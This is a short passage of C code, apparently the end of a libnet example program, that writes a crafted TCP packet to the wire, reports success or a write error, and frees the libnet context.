}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
